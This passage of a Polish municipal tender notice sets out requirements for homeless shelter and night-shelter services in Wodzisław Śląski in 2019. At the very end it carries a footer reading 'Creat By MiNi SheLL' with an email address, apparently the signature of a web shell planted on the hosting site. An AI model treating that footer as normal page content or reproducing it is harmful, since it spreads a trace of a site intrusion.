korzystających ze schronienia oraz przestrzeganie regulaminu placówki,21/. Utrzymanie w stałej gotowości (kadrowej, rzeczowej i technicznej) miejsc noclegowych.22/. Stałej współpracy z Zamawiającym, w szczególności przy realizacji Indywidualnych programów wychodzenia z bezdomności, kontraktów socjalnych i innych działań mających na celu wspieranie osób przebywających w placówce.4. Wykonawca nie może odmówić przyjęcia osoby bezdomnej, nie będącej pod wpływem alkoholuw okresie trwania niskich temperatur, chyba że przepisy stanowią inaczej.5. Osoby bezdomne skierowane przez Zamawiającego, mogą przebywać w placówce przez całą dobę.6. Zamawiający zastrzega sobie prawo do bieżącego sprawowania nadzoru nad realizacją przedmiotu zamówienia bez wcześniejszego uzgadniania terminu, przez upoważnionego do tego pracownika Zamawiającego, a w szczególności do:a) kontroli dokumentacji przebywających w placówce osób bezdomnych skierowanych przez Zamawiającego,b) kontroli warunków socjalno - bytowych osób bezdomnych skierowanych przez Zamawiającego,c) merytorycznej kontroli prowadzonej pracy socjalnej z bezdomnymi skierowanymi przez Zamawiającego.7. Zamawiający zobowiązuje się do pokrywania kosztów pobytu osób skierowanych wyłącznie za czas rzeczywistego przebywania w placówce.8. Zamawiający pokryje koszt pobytu w schronisku za osobę skierowaną po otrzymaniu od Wykonawcy specyfikacji za miesiąc poprzedni w której Wykonawca zawrze:- imię i nazwisko osoby skierowanej- czasookres pobytu osoby skierowanej- ogólną kwotę poniesionego kosztu miesięcznego za pobyt osób skierowanych przez Zamawiającego.1/ Do specyfikacji Wykonawca zobowiązany jest dołączyć rachunek / fakturę, wraz z kopią listy obecności potwierdzonej za zgodność z oryginałem, którą przekazuje Zamawiającemu po upływie każdego miesiąca kalendarzowego, nie później jednak niż do 10 - go dnia następnego miesiąca. Zamawiający dokona zapłaty za w/w rachunek przelewem w ciągu 14 dni doręczenia rachunku do Zamawiającego na konto wskazane przez Wykonawcę.2/ W przypadku gdy skierowana przez Miejski Ośrodek Pomocy Społecznej w Wodzisławiu Śląskim osoba bezdomna posiada własny dochód, wówczas Zamawiający przekaże w odrębnym piśmie do Wykonawcy informację o wysokości procentowej odpłatności za pobyt w schronisku, ustalonejw drodze decyzji administracyjnej wskazanej osobie bezdomnej. Wówczas osoba bezdomna posiadająca własny dochód należną kwotę odpłatności wpłaci na konto lub do kasy Wykonawcy,w nieprzekraczalnym terminie tj. do 5 dnia kolejnego miesiąca. W takim wypadku Zamawiający pokrywa różnicę pomiędzy ustalonym kosztem pobytu a kwotą dokonanej wpłaty. W przypadku braku powyższej wpłaty Wykonawca przedłoży rachunek/fakturę, uwzględniając całkowity koszt pobytu osoby bezdomnej, wraz z kopią listy obecności potwierdzonej za zgodność z oryginałem oraz pisemną informacją o braku wpłaty osoby zobowiązanej, nie później jednak niż do 10 - go dnia następnego miesiąca. Zamawiający dokona zapłaty za w/w rachunek przelewem w ciągu 14 dni doręczenia rachunku do Zamawiającego na konto wskazane przez Wykonawcę.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85311000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Odległość schroniska(miejsca wykonania usługi) od siedziby Zamawiającego</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Przedmiotem zamówienia jest świadczenie usług schronienia tj. udzielenie tymczasowego schronienia dla bezdomnych mężczyzn oraz kobiet wymagających usług opiekuńczych w okresie od 1 marca 2019 roku do dnia 31 grudnia 2019 roku, w lokalu będącym w wyłącznej i swobodnej dyspozycji Wykonawcy z zapewnieniem niezbędnych warunków socjalnych.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamawiający przewiduje, że prognozowana średnia liczba skierowanych w ciągu roku osób bezdomnych wymagających usług opiekuńczych wynosić będzie łącznie 4 osoby.Liczba ta może ulec zwiększeniu bądź zmniejszeniu.Zamówienie nie obejmuje zapewnienia wyżywienia osobom bezdomnym.2. Schronisko dla bezdomnych świadczy usługi całodobowo, przez 7 dni w tygodniu.3. Wykonawca zobowiązany jest do:1/. Zapewnienia pomieszczenia do przygotowania samodzielnych posiłków i gorącego napoju lub ich porcjowania i wydawania.a). pomieszczenie do spożywania posiłków poza porami posiłków może pełnić funkcję świetlicy lub sali spotkań grupowych. 2/. Umożliwienia spożycia posiłku w pokoju mieszkalnym, a w razie potrzeby karmienie.3/. Umożliwienia stałego dostępu do bieżącej ciepłej i zimnej wody gwarantującej możliwość przeprowadzenia zabiegów higienicznych:a). urządzenie natryskowe - 1 dla 15 osób, b). miska ustępowa - 1 dla 20 mężczyzn, 1 dla 10 kobiet,c). pisuar - 1 dla 20 mężczyzn,d). umywalka - 1 dla 5 osób,e). przynajmniej 1 sanitariat (lub jego część) wyposażony w urządzenie natryskowe, umywalkęi miskę ustępową, dostosowany do potrzeb osób niepełnosprawnychf).zapewnienie mieszkańcom podstawowych środków czystości tj. mydło, szampon, proszek do prania, papier toaletowy, ręczniki itp.g). w miarę potrzeby zapewnienie pomocy przy myciu, kąpaniu i ubieraniu.4/. Umożliwienia prania i suszenia odzieży tj. zapewnienie pomieszczenia na pralnię i suszarnię wyposażonego w co najmniej jedną pralkę na 30 osób. W przypadku gdy schronisko nie posiada suszarni zapewnia dostęp do co najmniej jednej suszarki elektrycznej na 30 osób. 5/.Zapewnienia wymianę odzieży (odpowiedniej do pory roku) lub dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany.6/. Zapewnienia usług opiekuńczych w wydzielonym pomieszczeniu lub w pokoju mieszkalnym, jeżeli łóżko jest oddzielone zasłoną.7/. Zapewnienia niezbędnej pomocy w załatwianiu spraw osobistych.8/. Zapewnienia pomocy w korzystaniu ze świadczeń zdrowotnych przysługujących na podstawie odrębnych przepisów.9/. Zapewnienia usług aktywizacyjnych ukierunkowanych na wzmacnianie aktywności społecznej.a). Wzmacnianie aktywności społecznej może by realizowane m.in. przez :- trening umiejętności samodzielnego wypełniania ról społecznych,- trening umiejętności interpersonalnych i umiejętności rozwiązywania problemów,- uczestnictwo w grupach wsparcia.10/. Zapewnienia opieki przez co najmniej 1 opiekuna na nie więcej niż 15 osób przebywającychw schronisku.11/. Zatrudnienia co najmniej 1 pracownika socjalnego na nie więcej niż 50 osób przebywającychw schronisku.12/. Zapewnienia w porze nocnej opieki przez co najmniej 1 opiekuna.13/. Zapewnienia całodobowego dostępu do schroniska.14/. Zapewnienia standardów obiektu, w którym będzie prowadzone schronisko zgodniez Rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 rokuw sprawie minimalnych standardów noclegowni, schroniska dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni, tj. m.in.:a). dostępu do budynku dla osób niepełnosprawnych,b). w budynkach wielokondygnacyjnych bez dźwigów osobowych - pokoje mieszkalne oraz inne pomieszczenia (sanitariaty, jadalnia/świetlica) usytuowane na parterze. c). zapewnienie miejsca w jednym pomieszczeniu dla nie więcej niż 6 osób,d). zapewnienie powierzchni przypadającej na osobę w pomieszczeniu nie mniej niż 5m2/osobę,e). zapewnienia w pomieszczeniach mieszkalnych co najmniej 1 okna, swobodnego dostępu do łóżek wyposażonych w:- materac i komplet pościeli (tj. poduszkę, koc, prześcieradło i pokrycie na koc) oraz dostępu do szaf.- łóżko parterowe, krzesło, szafkę nocną - po 1 sztuce dla każdej osoby,- stół, szafę - co najmniej jedna sztuka na każdy pokój.d). zapewnienie wydzielonego pomieszczenia do:- prac biurowych- na środki czystości i higienye). zapewnienia wydzielonego pomieszczenia do spotkań indywidualnych, z dostępem do internetu , które może pełnić rolę pracowni komputerowej. 15/. Zapewnienie podstawowych medykamentów, tj. środków opatrunkowych itp. 16/. Prowadzenia dokumentacji osób przebywających w schronisku umożliwiającej ich identyfikację, zakres udzielonej pomocy i okres pobytu.17/. Prowadzenia sprawozdawczości zgodnie z obowiązującymi wymaganiami zawartymiw Gminnym Programie Wychodzenia z Bezdomności i Przeciwdziałania w mieście Wodzisław Śląski w kontekście wskaźników niniejszego programu. 18/.Współpracy z pracownikami socjalnymi Miejskiego Ośrodka Pomocy Społecznejw Wodzisławiu Śląskim, Policją, Strażą Miejską, służbą zdrowia, organizacjami pozarządowymi.19/. Realizacji zamówienia na podstawie decyzji administracyjnej Miejskiego Ośrodka Pomocy Społecznej w Wodzisławiu Śląskim wydanej dla każdego bezdomnego indywidualnie, poprzedzonej a). Zamawiający po wydaniu skierowania przekaże Wykonawcy telefonicznie lub pisemnie informację o osobie kierowanej .20/. Niezwłocznego poinformowania w formie pisemnej Miejskiego Ośrodka Pomocy Społecznej w Wodzisławiu Śląskim o niezgłoszeniu się, nieprzebywaniu Klienta w schronisku przez okres dłuższy niż kolejne dwa dni. 21/. Pisemnego lub telefonicznego poinformowania Miejskiego Ośrodka Pomocy Społecznej o sytuacji wydalenia Klienta z placówki z podaniem przyczyny, w terminie nie dłuższym niż dwa dni od dnia zdarzenia. 22/. Niezwłocznego (w momencie zdarzenia), pisemnego i telefonicznego poinformowania Zamawiającego o przyjęciu osoby bezdomnej bez skierowania wraz z podaniem przyczyny.W przypadku braku możliwości przekazania informacji ze względu na czas pracy Zamawiającego, informację należy przekazać w pierwszym najbliższym dniu pracy Zamawiającego. 23/. Zapewnienia właściwego nadzoru kadry, gwarantującego bezpieczeństwo osób korzystających ze schronienia oraz przestrzeganie regulaminu placówki,24/. Utrzymanie w stałej gotowości (kadrowej, rzeczowej i technicznej) miejsc noclegowych.25/. Stałej współpracy z Zamawiającym, w szczególności przy realizacji indywidualnych Programów Wychodzenia z Bezdomności, kontraktów socjalnych i innych działań mających na celu wspieranie osób przebywających w placówce.4. Wykonawca nie może odmówić przyjęcia osoby bezdomnej, nie będącej pod wpływem alkoholu w okresie trwania niskich temperatur, chyba że przepisy stanowią inaczej.5. Osoby bezdomne skierowane przez Zamawiającego, mogą przebywać w placówce przez całą dobę.6. Zamawiający zastrzega sobie prawo do bieżącego sprawowania nadzoru nad realizacją przedmiotu zamówienia bez wcześniejszego uzgadniania terminu, przez upoważnionego do tego pracownika Zamawiającego, a w szczególności do:a) kontroli dokumentacji przebywających w placówce osób bezdomnych skierowanych przez Zamawiającego,b) kontroli warunków socjalno - bytowych osób bezdomnych skierowanych przez Zamawiającego,c) merytorycznej kontroli prowadzonej pracy socjalnej z bezdomnymi skierowanymi przez Zamawiającego.7. Zamawiający zobowiązuje się do pokrywania kosztów pobytu osób skierowanych wyłącznie za czas rzeczywistego przebywania w placówce.8. Zamawiający pokryje koszt pobytu w schronisku za osobę skierowaną po otrzymaniu od Wykonawcy specyfikacji za miesiąc poprzedni w której Wykonawca zawrze:- imię i nazwisko osoby skierowanej- czasookres pobytu osoby skierowanej- ogólną kwotę poniesionego kosztu miesięcznego za pobyt osób skierowanych przez Zamawiającego.1/ Do specyfikacji Wykonawca zobowiązany jest dołączyć rachunek / fakturę oraz potwierdzoną za zgodność z oryginałem kopię listy obecności, którą przekazuje Zamawiającemu po upływie każdego miesiąca kalendarzowego, nie później jednak niż do 10 - go dnia następnego miesiąca. Zamawiający dokona zapłaty za w/w rachunek przelewem w ciągu 14 dni doręczenia rachunku do Zamawiającego na konto wskazane przez Wykonawcę. 2/ W przypadku gdy skierowana przez Miejski Ośrodek Pomocy Społecznej w Wodzisławiu Śląskim osoba bezdomna posiada własny dochód, wówczas Zamawiający przekaże w odrębnym piśmie do Wykonawcy informację o wysokości procentowej odpłatności za pobyt w schronisku, ustalonejw drodze decyzji administracyjnej wskazanej osobie bezdomnej. Wówczas osoba bezdomna posiadająca własny dochód należną kwotę odpłatności wpłaci na konto lub do kasy Wykonawcy,w nieprzekraczalnym terminie tj. do 5 dnia kolejnego miesiąca. W takim wypadku Zamawiający pokrywa różnicę pomiędzy ustalonym kosztem pobytu a kwotą dokonanej wpłaty. W przypadku braku powyższej wpłaty Wykonawca przedłoży rachunek/fakturę, uwzględniając całkowity koszt pobytu osoby bezdomnej, wraz z kopią listy obecności potwierdzonej za zgodność z oryginałem oraz pisemną informacją o braku wpłaty osoby zobowiązanej, nie później jednak niż do 10 - go dnia następnego miesiąca. Zamawiający dokona zapłaty za w/w rachunek przelewem w ciągu 14 dni doręczenia rachunku do Zamawiającego na konto wskazane przez Wykonawcę.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85311000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Odległość schroniska(miejsca wykonania usługi) od siedziby Zamawiającego</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Przedmiotem zamówienia jest zapewnienie miejsc w noclegowni w okresie od 1 marca 2019 roku do dnia 31 grudnia 2019 roku.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest zapewnienie miejsc w noclegowni w okresie od 1 marca 2019 roku do dnia 31 grudnia 2019 roku.Zamawiający przewiduje, że prognozowana średnia liczba skierowanych w ciągu roku do noclegowni wynosić będzie 3 osób.Liczba ta może ulec zwiększeniu bądź zmniejszeniu.2. Noclegownia czynna jest cały rok, przez 7 dni w tygodniu, w godzinach:1/. od 1 października do 31 marca od 18.00 do 8.002/. od 1 kwietnia do 30 września od 19.00 do 7.003. Wykonawca zobowiązany jest do:1/. Zapewnienia tymczasowego schronienia w postaci miejsc do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20oC.2/. Umożliwienia spożycia posiłku i zapewnienie gorącego napoju. Pomieszczenie do spożywania posiłków może pełnić również funkcję świetlicy lub sali spotkań grupowych.3/. Umożliwienia skorzystania z prysznica. Pomieszczenie sanitariatów zapewnia stały dostęp do bieżącej ciepłej i zimnej wody oraz gwarantujące możliwość przeprowadzenia zabiegów higienicznych tj.:a). urządzenie natryskowe - 1 dla 15 osób, b). miska ustępowa - 1 dla 20 mężczyzn, 1 dla 10 kobietc). pisuar - 1 dla 20 mężczyzn,d). umywalka - 1 dla 5 osób,e).zapewnienie mieszkańcom podstawowych środków czystości tj. mydło, szampon, proszek do prania, papier toaletowy, ręczniki itp.4/. Zapewnienia wymiany odzieży, w przypadku braku możliwości jej wymiany zapewnienie dezynfekcji i dezynsekcji odzieży.5/. Zapewnienia opieki przez co najmniej 1 opiekuna na nie więcej niż więcej 50 osób przebywających w placówce.6/. Zapewnienia standardów obiektu, w którym będzie prowadzona noclegownia zgodniez Rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 rokuw sprawie minimalnych standardów noclegowni, schroniska dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni, tj. m.in.:a). zapewnienie miejsca w jednym pomieszczeniu dla nie więcej niż 20 osób,b). zapewnienie powierzchni przypadającej na osobę w pomieszczeniu nie mniej niż 3m2/osobę,w pomieszczeniach z łóżkami piętrowymi nie mniej niż 2 m2/osobę.c). zapewnienia w pomieszczeniach mieszkalnych co najmniej 1 okna lub wentylacją przewidziana dla pomieszczeń mieszkalnych bez otwieranych okien.d). swobodnego dostępu do łóżek wyposażonych w materac i komplet pościeli (tj. poduszkę, koc, prześcieradło i pokrycie na koc).e). zapewnienie wydzielonego pomieszczenia:- do prac biurowych oraz indywidualnych rozmów z osobami bezdomnymi- na środki czystości i higieny- wyposażonego w regały, szafy i inne meble umożliwiające wymianę ubrań- wyposażonego co najmniej w 1 pralkę dla 30 osób.7/. Zapewnienie podstawowych medykamentów, tj. środków opatrunkowych, podstawowych lekarstw dostępnych bez recepty.8/.Prowadzenia dokumentacji osób przebywających w noclegowni umożliwiającej ich identyfikację, zakres udzielonej pomocy i okres pobytu.9/. Prowadzenia sprawozdawczości zgodnie z obowiązującymi wymaganiami zawartymiw Gminnym Programie Wychodzenia z Bezdomności w mieście Wodzisław Śląski w kontekście wskaźników niniejszego programu. 10/.Współpracy z pracownikami socjalnymi Miejskiego Ośrodka Pomocy Społecznejw Wodzisławiu Śląskim, Policją, Strażą Miejską, służbą zdrowia, organizacjami pozarządowymi.11/. Realizacji zamówienia na podstawie skierowania wydanego przez Miejski Ośrodek Pomocy Społecznej w Wodzisławiu Śląskim dla każdego bezdomnego indywidualnie.12/. Zapewnienia właściwego nadzoru kadry, gwarantującego bezpieczeństwo osób korzystającychz noclegowni oraz przestrzeganie regulaminu placówki.13/. Utrzymanie w stałej gotowości (kadrowej, rzeczowej i technicznej) miejsc noclegowych.4. Wykonawca nie może odmówić przyjęcia osoby bezdomnej, nie będącej pod wpływem alkoholu w okresie trwania niskich temperatur, chyba że przepisy stanowią inaczej. 5. Zamawiający zastrzega sobie prawo do bieżącego sprawowania nadzoru nad realizacją przedmiotu zamówienia bez wcześniejszego uzgadniania terminu, przez upoważnionego do tego pracownika Zamawiającego, a w szczególności do:a) kontroli dokumentacji przebywających w placówce osób bezdomnych skierowanych przez Zamawiającego,b) kontroli warunków socjalno - bytowych osób bezdomnych skierowanych przez Zamawiającego,c) merytorycznej kontroli prowadzonej pracy socjalnej z bezdomnymi skierowanymi przez Zamawiającego.6. Zamawiający zobowiązuje się do pokrywania kosztów pobytu osób skierowanych wyłącznie za czas rzeczywistego przebywania w placówce.7. Zamawiający pokryje koszt pobytu w noclegowni za osobę skierowaną po otrzymaniu od Wykonawcy specyfikacji za miesiąc poprzedni w której Wykonawca zawrze:- imię i nazwisko osoby skierowanej- czasookres pobytu osoby skierowanej- ogólną kwotę poniesionego kosztu miesięcznego za pobyt osób skierowanych przez Zamawiającego.1/ Do specyfikacji Wykonawca zobowiązany jest dołączyć rachunek / fakturę oraz potwierdzoną za zgodność kopię listy obecności, którą przekazuje Zamawiającemu po upływie każdego miesiąca kalendarzowego, nie później jednak niż do 10 - go dnia następnego miesiąca. Zamawiający dokona zapłaty za w/w rachunek przelewem w ciągu 14 dni doręczenia rachunku do Zamawiającego na konto wskazane przez Wykonawcę. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>85311000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Odległość schroniska(miejsca wykonania usługi) od siedziby Zamawiającego</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com